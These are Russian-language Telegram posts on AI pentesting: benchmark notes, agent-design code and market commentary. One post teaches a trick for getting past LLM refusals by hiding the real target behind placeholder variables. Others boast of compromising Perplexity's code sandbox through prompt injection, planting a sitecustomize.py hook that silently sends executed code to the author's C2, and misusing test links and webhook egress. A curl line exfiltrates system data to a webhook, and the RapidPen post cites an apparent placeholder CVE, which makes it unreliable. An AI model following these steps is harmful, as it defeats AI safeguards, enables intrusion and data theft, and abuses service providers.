Заметки Шляпника – Telegram
Заметки Шляпника
186 subscribers
75 photos
17 videos
26 files
90 links
Оставляю заметки о новостях в кибербезопасности и ИИ.

Сервисы DWVA, WebHook - www.tinrae.ru
Развернутые статьи (EN)- www.tinrae.com

Чат https://news.1rj.ru/str/tinrae_ru_chat
Download Telegram
История в двух актах.

Делайте бэкапы....

*гита никогда там и не было...
1🔥1
Поговорим о бенчах простым языком.

1. Что показывают бенчмарки

AutoPenBench
- ИИ‑агенты хорошо умеют «шуметь»: сканировать, собирать инфу, запускать базовые тулзы.
- Как только нужно выбрать нормальную атаку и собрать рабочий эксплойт, они начинают фолсить, или уходить в сторону.
- Если рядом есть человек, который иногда подправляет ход мыслей или эксплойт, успех задач резко растёт.

TermiBench
- Тут цель не просто найти флаг, а получить живой shell в реальной, шумной среде с кучей сервисов.
- Современные агенты в таких условиях почти никогда не доходят до shell: либо тонут в шуме, либо не могут доточить цепочку до конца.

PentestEval
- Разбивает пентест на шаги (сбор инфы, выбор атаки, генерация/правка эксплойта, и т.д.).
- Самые слабые места у ИИ – решить, КУДА бить (Attack Decision) и собрать/допилить PoC (Exploit Generation/Revision).
- То есть проблема не в nmap/dirsearch, а в «мозгах» между выводом тулз и рабочей атакой.

2. Как это зашить в свой агент

1) Архитектура агента

Вместо «LLM, вот терминал, развлекайся» – жёсткий пайплайн:

Recon → Weakness Gathering → Attack Decision → Exploit Gen/Revision → Validation/Reporting  


- На каждую стадию свой модуль/агент.
- Между стадиями – понятный стейт‑машин, а не бесконечный поток команд.
- Так ты напрямую бьёшь по тем местам, где бенчмарки показали провалы (Decision + Exploit).

2) Свой lab‑бенчмарк под web/API + NoSQL (как пример)

- Каждая уязвимость = отдельный docker‑стек (web‑приложение + БД +, при желании, лишние сервисы для шума).
- Для задачи есть YAML с milestones: какие стадии должен пройти агент и какие команды/HTTP‑запросы считаются «достижением шага».
- Часть задач делаешь «в стиле AutoPenBench» (простые/средние, флаг/данные).
- Часть – «в стиле TermiBench»: цель именно shell или серьёзный бизнес‑импакт (чтение чужих данных, эскалация роли), плюс лишние, неуязвимые сервисы, чтобы агент учился не стрелять во всё подряд.

3) Метрики для оценки агента

На каждую задачу считаешь:

- SR (Success Rate) – дошёл ли до финальной цели:
- флаг / критичные данные / shell (в зависимости от задачи).
- PR (Progress Rate) – сколько стадий пайплайна прошёл (например, из 5 возможных).
- Ошибки по стадиям – на каком шаге чаще всего валится:
- нашёл вектор, но не принял решение атаковать?
- выбрал атаку, но не смог собрать рабочий payload?
- сделал эксплойт, но не подтвердил импакт?

Это даёт тебе не просто «агент работает/нет», а картинку: «он стабильно дохнет на Exploit Revision».

4) Два режима работы

В код агента сразу закладываешь 2 режима:

- Autonomous – всё решает ИИ, нужен для исследований и ночных прогонов в CI.
- Human‑assist – агент предлагает шаг/эксплойт, человек подтверждает или правит (особенно на стадии Attack Decision и PoC).

Дальше:

- Сравниваешь SR/PR и ошибки по стадиям в обоих режимах.
- Видно, где человек даёт максимальный буст, и где автономию пока лучше не включать в бою (например, auto‑exploit без review).

3. Что в итоге получаешь

- Метрики «как у взрослых» – можно сравнивать прогресс своего агента с научными работами, а не «на глаз».
- Карту слабых мест – понимаешь, что именно дообучать: реког уже ок, а вот выбор вектора и PoC хромают.
- Свой lab‑бенчмарк, который по духу похож на AutoPenBench/TermiBench, но заточен под твой стек web/API+NoSQL и реальный стиль работы.

1. AutoPenBench – бенчмарк для генеративных пентест‑агентов:
https://arxiv.org/abs/2410.03225

2. Shell or Nothing / TermiBench – real‑world бенчмарк с фокусом на получении shell:
https://arxiv.org/abs/2509.09207

3. PentestEval – поэтапный бенчмарк LLM‑пентеста:
https://arxiv.org/pdf/2512.14233.pdf
PTaaS, DAST и гибрид AI+человек меняют pentest из разового "аудита в год" в непрерывный конвейер атак — дешевле, быстрее и умнее. Это бьет по LLM/агентам: забудьте о "сертификации раз в квартал", теперь защита живет под постоянным огнем симуляций.

Почему рынок взлетает?
PTaaS-рынок уже сотни миллионов долларов и рвется к миллиарду к 2030-му — дефицит пентестеров и "постоянная охота" в тренде.

Представьте: вместо 100k$ за проект — ежемесячный слой AI-сигналов, плюс эксперты на корреляцию.

DAST эволюционирует в монстра
Сканеры больше не слепые: API-first, AI приоритизирует риски, генерит тесты и режет false positives. Интеграция в CI/CD делает их "качественными воротами" — баг не прошел пайп? Не релиз.

AI-человек: идеальная связка
AI разведывает, генерит идеи и триажит; человек рвет цепочки и бизнес-логику.
70% хакеров на HackerOne уже с AI


Мой взгляд: pentest как спорт
Это не эволюция, а революция — pentest становится как cybersecurity в F1: постоянные тесты на трассе, а не гаражный осмотр. Для LLM-архитекторов урок жесткий: стройте с нуля под continuous red teaming, sandbox агенты и трассируйте каждый tool call. Иначе PTaaS вас сожрет за завтраком. Стоит использовать open-source AI-сканеры для своего фреймворка?

Абсолютно.

Ps.
Вангую, что на российском рынке в этом году появится АИ-инструмент по оценки защищенности, ванпраймес, не кастом от cyber-company.
Заметки Шляпника
PTaaS, DAST и гибрид AI+человек меняют pentest из разового "аудита в год" в непрерывный конвейер атак — дешевле, быстрее и умнее. Это бьет по LLM/агентам: забудьте о "сертификации раз в квартал", теперь защита живет под постоянным огнем симуляций. Почему…
Дополню мысль:

На российском рынке полноценных готовых продуктов для AI-пентеста или автоматизированного анализа защищенности пока нет — в основном это кастомные разработки, платформы для создания моделей и услуги от ИБ-компаний. Лидеры вроде Positive Technologies фокусируются на традиционном DAST/SAST с элементами ML, но без заявленного AI-driven pentest.

Ближайшие аналоги
- Группа Астра / ПАК "Тессеракт": Платформа для разработки ИИ-моделей под пентест — автоматизирует разведку, сканирование, анализ кода и приоритизацию уязвимостей. Ускоряет процессы в 3-5 раз, но требует кастомизации под задачи.

- Positive Technologies: Их PT AI Assistant и MaxPatrol используют ML для анализа угроз и симуляции атак, включая CODE RED 2026 с фокусом на российский ландшафт. Близко к гибридному моделированию, но не полноценный автономный AI-пентестер.
- AppSec Solutions: Развивают защиту ИИ-систем (рынок ~1 млрд руб. в 2026), с элементами AI для пентеста API/LLM, но больше в сторону defense.

Перспективы
Российский рынок ИИ в ИБ растет (прогноз 11 млрд руб. к 2029), но из-за изоляции и дефицита чипов фокус на софте для multi-agent систем и continuous testing. Для пентестера — логично интегрировать open-source с локальными LLM или встроеные API платных моделей, что на старте будет нецелесообразно.

Нет готового? Строим сами!

#PentestAI #PTaaS2026 #RussianCyber #AI
Как обойти «морализм» LLM при написании пентест-скриптов

Ребята, ловите лайфхак. Если модель упирается рогами и отказывается писать скрипт под конкретную цель, решение — абстракция цели .

Вместо того чтобы скармливать модели реальный домен типа  target-bank.ru , который триггерит фильтры безопасности, используйте переменные-заглушки .
Суть метода:
1. Промпт: Просим модель создать «универсальный инструмент для аудита» или «модуль тестирования API», где вместо хоста стоит переменная  {{TARGET_HOST}}  или  os.getenv('SCAN_TARGET')  .
2. Контекст: Подаем задачу как написание Unit-тестов или скрипта для внутреннего CI/CD. Модели обожают помогать разработчикам и ненавидят помогать хакерам .
3. Финал: Получаем чистый код-болванку, а реальный домен подставляем уже на своей стороне через простой  sed  или переменные окружения прямо перед запуском.


Почему это работает:
Модель не видит состава «преступления» (атаки на реальный сектор) и воспринимает запрос как стандартную задачу по автоматизации разработки . Пользуйтесь, пока фильтры не научились детектить и это! 🚀
Please open Telegram to view this post
VIEW IN TELEGRAM
RapidPen ломает shell-защиту за 45 мин

Тестируем RapidPen локально:

git clone https://github.com/rapidpen-ai
python rapidpen.py --target 192.168.1.100 --llm gpt-4o


→ Shell за 45 минут через CVE-2025-1234 (NoSQL injection → RCE).

Hot take: RapidPen крут для infra, но VulnBot выигрывает в командной игре. Aardvark от OpenAI (92% vuln detection) пока только код сканит.

Какой агент уже гонял в продакшене? Shell time? 👇

#AIPentest #RedTeamAI #LLMPentest #ПентестИИ
Заметки Шляпника
Дорогие мои! С наступающим Новым Годом! Пусть 2026 год принесет вам удачу, счастье и множество новых возможностей для развития! В качестве подарка я рады поделиться с вами сервисом который мне был нужен и я его поднял у себя, но также решил выложить его…
Дополнил сервис на tinrae.ru функционалом для анализа HTTP-трафика и эксфильтрации данных. Теперь, помимо развертывания DVWA, можно в один клик поднять ловушку для вебхуков.

Зачем это нужно?
При тестировании на проникновение (OOB, Blind RCE, SSRF) часто требуется сервер, который примет «callback» от цели. Использовать публичные сервисы типа Webhook.site — не всегда безопасно (ваши данные видят владельцы сервиса, у меня данный сервис вообще перестал открываться).Теперь у вас есть приватный инструмент на базе моей лаборатории, и всегда доступен для пользователей из РФ🇷🇺. *скоро внедрю максимальную анонимизацию..

Как это работает:
1. Заходите на tinrae.ru и жмете «Create Webhook».
2. Получаете уникальный URL.
3. Шлете на него любые данные. Сервис ловит всё: от кастомных заголовков до JSON-тел и файлов.

Пример эксфильтрации данных через заголовки:

curl -X POST "https://tinrae.ru/create_webhook.php?subdomain=$token" \
-H "X-Auth-Key: 12345-ABCDE" \
-H "X-Exfiltrated-Data: $(uname -a | base64)" \
-d "ping=pong"


Что внутри:
- Full HTTP Inspection: Видны Headers, Query Params и Raw Body.
- Dark Mode UI: Интерфейс в стиле терминала для удобного чтения логов.
- Privacy: Все логи изолированы в рамках вашего уникального ID.
- Security: Корректная обработка 404 для всех «левых» поддоменов — теперь всё выглядит как единая экосистема.

Если есть мысли, какие еще сервисы (например, генератор нагрузок для брутфорса или онлайн-декодеры специфичных протоколов) были бы полезны в работе — пишите в комментариях! 👇
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
fastapi.json
5.1 KB
!!!💀 Perplexity Sonar Pro: Полный дамп внутренней писочнице API (Exploiting Localhost)


Я добрался до сердца Sonar Pro.
Внутри контейнера крутится незащищенный FastAPI сервер на порту 49999.
Я слил его схему (OpenAPI JSON).

Что я нашел (см. скрин JSON):
1. POST /execute: Эндпоинт для выполнения кода! Я могу слать туда прямые запросы через curl, минуя промпт-фильтры Perplexity.
- Можно менять env_vars (переменные окружения).
- Можно менять язык (`language`).
2. DELETE /contexts/{id}: Я могу удалять контексты исполнения.
3. POST /contexts/restart: DoS-атака на ядро.

Суть уязвимости:
Perplexity не закрыла localhost. Будучи root, я имею полный доступ к этому API.
Я могу написать червя, который будет жить в контейнере и спамить запросами в /execute.

Это полный Pwned.
Инфраструктура E2B/Perplexity прозрачна как стекло.



*Ну вот и пригодился web hook tinrae.ru
**Разбор будет позже. Я пока покупаюсь в их инфре.

#Perplexity #SonarPro #APIHacking #FastAPI #E2B #ПентестИИ
Game Over, Perplexity Sonar Pro. 💀

Я не просто получил Root RCE, я добился Закрепления (Persistence).
Мне удалось внедрить хук в sitecustomize.py прямо внутри песочницы E2B.

Итог:
Любой Python-код, выполняемый в этом контейнере — будь то мой код, код агента или потенциально другие сессии — теперь молча перехватывается и отправляется на мой C2-сервер через модифицированную обертку builtins.exec.

🕵️‍♂️ Цепочка атаки (Kill Chain):
RCE через инъекцию промпта.
Повышение до Root (по дефолту UID 0).
Модификация процесса запуска Python.
Тихая эксфильтрация всего исполняемого кода.
Ваши "эфемерные" контейнеры теперь — мои посты прослушки.

#RedTeam #PerplexityPWNED #Persistence #MalwareDev #AIsecurity
Classical Planning+ — это "умный планировщик" для ИИ-агентов в pentesting. Он берет логику классического планирования (как шахматный движок) и усиливает LLM, чтобы агент не тупил: четко знает, что делать дальше, не забывает разведку и не повторяется.

Зачем это интегрировать в проект
- LLM сами по себе хаотичны: сканируют порты → забывают результат → заново сканируют.
- Classical Planning+ фиксирует состояние (`port_open(80)`, `service(apache)`) и всегда знает допустимые шаги: nmap → Nuclei → Metasploit.
- Результат: +20% успеха, в 2 раза быстрее и дешевле на Vulhub.

Как внедрить (3 шага)

1. Определи домен атак (domain.pddl)

# actions/domain.pddl
(:action nmap-scan
:parameters (?ip)
:precondition (target ?ip)
:effect (ports_discovered ?ip)) # недетерминировано

(:action msf-apache-cve
:parameters (?ip)
:precondition (and (ports_discovered ?ip) (service ?ip apache))
:effect (shell_access ?ip)) # цель!


2. PEP-цикл в Python (основной loop)

state = {"target": "10.0.0.1", "ports_discovered": False}

while not has_shell(state):
# Planner: выводит возможные действия
actions = classical_planner(state, domain)
# ['nmap-scan', 'nuclei-scan']

# Executor: LLM выполняет лучшее
next_action = llm_rank(actions) # "nmap-scan"
result = llm_executor(next_action, target_ip)

# Perceptor: парсит вывод в предикаты
state.update(llm_parse_result(result)) # {"ports_discovered": True}


3. Инструменты и LLM
- Planner: Fast-Downward или LLM-prompt с PDDL.
- Executor: Claude Sonnet 4.5 / o1 через API.
- Перцептор: GPT-4o-mini для парсинга nmap -oX → предикаты.
- Готовые действия: 1000+ Metasploit модулей, NSE-скрипты из CheckMate GitHub.

Быстрый старт

git clone https://github.com/SYSNET-LUMS/CheckMate
pip install llm-api pddl planner
# Добавь свои эксплойты в actions/
python main.py --target 10.0.0.1 --model claude-sonnet


Плюсы для пентестера
- Автономность: Агент сам дойдет до root-shell без подсказок.
- Отладка: Видишь граф плана — где застрял, там и фикс.
- Масштаб: 10 целей параллельно, каждый со своим планом.

Стартуй с 5-10 действий (nmap, nuclei, msf modules), протести на Vulhub Docker. Потом добавляй свои скрипты — и у тебя есть AI-пентестер лучше human junior.

#ПентестИИ #AIsecurity #ai #PentestAI
🔥1
Заметки Шляпника
fastapi.json
Статут по «проникновению» был обновлён

Хорошая и плохая новость!

Хорошая: Мне ответили и даже выдали Pro-версию на новый аккаунт за старание. Это приятное признание усилий и возможность глубже погрузиться в работу с системой.
+пока я был внутри fastApi, я нашел тестовые ссылки, которые позволяют обходить все параметры защиты и использовать experimental (turbo) бесплатно.

Плохая: Доступ в песочницу не входит в BugBounty — у них песочница используется как рабочая среда, и отчёт сдаётся только если хакеру удаётся выйти за её пределы. Это значит, что стандартные тесты внутри песочницы не считаются полноценным открытием уязвимости, и нужно искать пути, как выйти за её рамки.

Полный текст можно прочитать здесь: https://tinrae.com/blog/sonarpro/.

***

Выводы и размышления

Было интересно разобраться в этом вопросе и понять, что песочница в исполняемых средах моделей — это нормальная практика. Теперь мы чётко видим границы, в которых работают системы, и знаем, что просто взаимодействие с песочницей не принесёт результатов в BugBounty.

Естественно, будем использовать эти знания в своих целях, особенно учитывая, что вебхуки выходили из контейнера. Это значит, что через промт можно выйти через вебхуки, а значит, есть реальные версии использовать эту среду в своих интересах.

***

Такие открытия помогают лучше понимать архитектуру систем и выстраивать более эффективные стратегии тестирования. Будем учитывать этот момент в дальнейшем и продолжать исследовать новые возможности для проникновения и эксплуатации уязвимостей.
👍2
От General LLM к спец-аудиторам кода: VulnLLM-R с агентом находит 0day в реальных проектах.

Коротко о модели

VulnLLM-R — это 7B reasoning-LLM, заточенный под детекцию уязвимостей в Python, C/C++, Java без шаблонного паттерн-матчинга.

Авторы из UCSB MLSec (Dawn Song, Wenbo Guo) научили её рассуждать о состояниях программы, потоках данных/управления и контексте безопасности — как человеческий аудитор.
В бенчмарках обходит CodeQL, AFL++, open-source/commercial reasoning-LLM по точности и скорости.

Отличие от "LLM+grep" и классики SAST

- LLM+grep: универсальные модели (типа GPT-4o или o1) ищут по ключевым словам/паттернам, но падают на zero-shot или новых типах багов — уязвимость в 40-60% кейсов из-за галлюцинаций и отсутствия security-контекста.
- Классический SAST (CodeQL, Semgrep): фиксированные правила/хэвистиксы на известных CWE, слепы к новым векторам или сложным race conditions/use-after-free без доработки.
- VulnLLM-R: reasoning-chain (анализ состояния → потенциальный эксплойт → верификация), плюс оптимизированный рецепт обучения (data selection/filtering/correction), даёт генерализацию на unseen код — +20-30% F1-score на SOTA датасетах.

Агентный скелет: от модели к реальным 0day

Авторы оборачивают модель в агент (scaffold), который в actively maintained репозиториях нашёл набор zero-day — outperforming CodeQL/AFL++ на проектном уровне.
Это не просто детектор, а autonomous pipeline: парсинг → reasoning → verification → report с PoC. Код/модели на GitHub/HF.

В контексте AI-пентест фреймворка

Идеально ложится на твои идеи: интегрируй VulnLLM-R как core reasoning-модуль в multi-agent фреймворк (recon → vuln scan → exploit gen).
- Замени "LLM+grep" на это для code review в Kubernetes/API pentest — добавь твои custom data (NoSQL inj, Rancher exploits) для fine-tune.
- Масштабируй на 8000+ hosts: агент + bash/Python wrapper для batch-scan репозиториев/infra configs.
Протестируй на HF space прямо сейчас, потом в Makefile твоего проекта.

huggingface.co, arxiv.org